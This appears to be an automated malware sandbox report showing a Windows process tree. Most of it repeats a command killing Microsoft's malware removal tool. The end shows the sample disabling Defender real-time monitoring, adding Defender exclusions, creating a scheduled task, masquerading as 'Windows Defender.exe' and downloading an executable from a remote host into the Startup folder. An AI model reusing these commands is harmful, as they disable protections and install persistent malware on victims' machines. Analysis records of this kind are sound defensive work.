        PID:5660
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5228
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5628
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2576
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5212
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2028
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5164
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3416
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3812
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4280
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5800
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5844
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5548
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5336
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3916
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5684
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5400
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3552
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3804
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:5704
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:208
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4492
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2808
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2444
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5772
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3576
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5828
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5524
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:5788
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5660
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5228
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5628
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4380
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4876
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2028
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2604
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2088
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3044
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6096
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3396
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3504
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5996
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4840
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1872
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4964
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3792
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2616
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5292
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3096
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2672
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5036
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1940
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3116
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3156
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5952
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:1280
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5708
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5512
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5936
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5596
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2532
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5944
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2128
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5808
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:5188
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:4876
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2028
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3232
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6044
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2648
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5140
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6020
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5372
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:628
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4036
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6104
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:876
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1552
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:396
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4832
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5520
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4700
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5776
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5656
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1940
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5840
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5868
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5688
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1768
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1612
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5976
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4612
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:5524
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2044
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5228
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6132
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5212
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1176
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6024
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5164
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6092
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:1100
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:3396
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:3568
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5996
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:628
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4712
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6080
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1540
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5700
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5440
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3096
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:5560
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2368
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5896
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:180
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:636
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5928
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3492
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5880
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2320
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5512
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5976
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5980
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5272
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2676
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:732
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1088
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6120
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4936
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3720
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5024
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3044
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1500
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3896
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4572
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5584
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5336
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4712
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5352
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5348
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3692
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5536
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5388
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3948
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:720
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2084
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5408
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4196
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:2884
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:5836
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5796
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5824
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4624
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5224
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5652
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6012
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4300
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1924
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3964
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4812
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5788
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5156
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:3232
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5212
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:936
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3152
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3396
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5144
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1744
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5684
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6112
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5452
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2664
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:396
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5292
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3468
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5412
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2672
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2036
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:532
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3668
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2808
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5900
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4128
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2404
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5740
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1104
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1204
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5260
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2044
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:5628
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1680
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5264
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3696
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:6052
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5692
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1116
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3044
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5252
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4684
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5128
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5732
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Telegram Web\Prem.bat" "
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5012
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /min /C "set __COMPAT_LAYER=RUNASINVOKER && start "" "C:\Users\Admin\AppData\Roaming\Telegram Web\Roman.exe""
        8⤵
        Access Token Manipulation: Create Process with Token
        System Location Discovery: System Language Discovery
        
        PID:1736
        
        C:\Users\Admin\AppData\Roaming\Telegram Web\Roman.exe
        
        "C:\Users\Admin\AppData\Roaming\Telegram Web\Roman.exe"
        9⤵
        Executes dropped EXE
        
        PID:3396
        
        C:\Users\Admin\AppData\Roaming\Telegram Web\Roman.exe
        
        "C:\Users\Admin\AppData\Roaming\Telegram Web\Roman.exe"
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1604
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command " Set-MpPreference -DisableRealtimeMonitoring $true ""
        11⤵
        
        PID:5092
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "
        12⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4492
        
        C:\Users\Admin\AppData\Local\Comms\Ram.exe
        
        "C:\Users\Admin\AppData\Local\Comms\Ram.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2068
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Telegram Web\Rostic.bat" "
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3676
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /min /C "set __COMPAT_LAYER=RUNASINVOKER && start "" "C:\Users\Admin\AppData\Local\Comms\Windows Defender.exe""
        8⤵
        Access Token Manipulation: Create Process with Token
        System Location Discovery: System Language Discovery
        
        PID:876
        
        C:\Users\Admin\AppData\Local\Comms\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Comms\Windows Defender.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:3372
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Comms\Windows Defender.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4516
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Defender.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6124
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender" /tr "C:\ProgramData\Windows Defender.exe"
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1780
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TMPDE45.tmp\Melan.vbs"
        7⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:4960
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TMPDE45.tmp\mdkd.bat" "
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4236
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://envs.sh/E3L.exe', 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DlpUserAgent.exe')"
        9⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Drops startup file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4228
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DlpUserAgent.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DlpUserAgent.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3680
        
        C:\Windows\system32\wscript.exe
        
        "C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\88B3.tmp\88C4.tmp\88C5.vbs //Nologo
        10⤵
        Checks computer location settings
        
        PID:3396
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Telegram Web\Rostic.bat" "
        11⤵
        
        PID:3576
        
        C:\Windows\system32\cmd.exe
        
        cmd /min /C "set __COMPAT_LAYER=RUNASINVOKER && start "" "C:\Users\Admin\AppData\Local\Comms\Windows Defender.exe""
        12⤵
        Access Token Manipulation: Create Process with Token
        
        PID:5744
        
        C:\Users\Admin\AppData\Local\Comms\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Comms\Windows Defender.exe"
        13⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5884
        
        C:\Users\Admin\AppData\Local\Comms\Vulture.exe
        
        "C:\Users\Admin\AppData\Local\Comms\Vulture.exe"
        11⤵
        Executes dropped EXE
        
        PID:1940
        
        C:\Users\Admin\AppData\Local\Comms\Vulture.exe
        
        "C:\Users\Admin\AppData\Local\Comms\Vulture.exe"
        12⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5268
        
        C:\Users\Admin\AppData\Roaming\Telegram Web\Lenochka.exe
        
        "C:\Users\Admin\AppData\Roaming\Telegram Web\Lenochka.exe"
        11⤵
        Executes dropped EXE
        
        PID:5160
        
        C:\Users\Admin\AppData\Roaming\Telegram Web\Lenochka.exe
        
        "C:\Users\Admin\AppData\Roaming\Telegram Web\Lenochka.exe"
        12⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5652
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Telegram Web\Dolmatinec.bat" "
        11⤵
        
        PID:5276
        
        C:\Windows\system32\cmd.exe
        
        cmd /min /C "set __COMPAT_LAYER=RUNASINVOKER && start "" "C:\Users\Admin\AppData\Local\Comms\Rem.exe""
        12⤵
        Access Token Manipulation: Create Process with Token
        
        PID:5944
        
        C:\Users\Admin\AppData\Local\Comms\Rem.exe
        
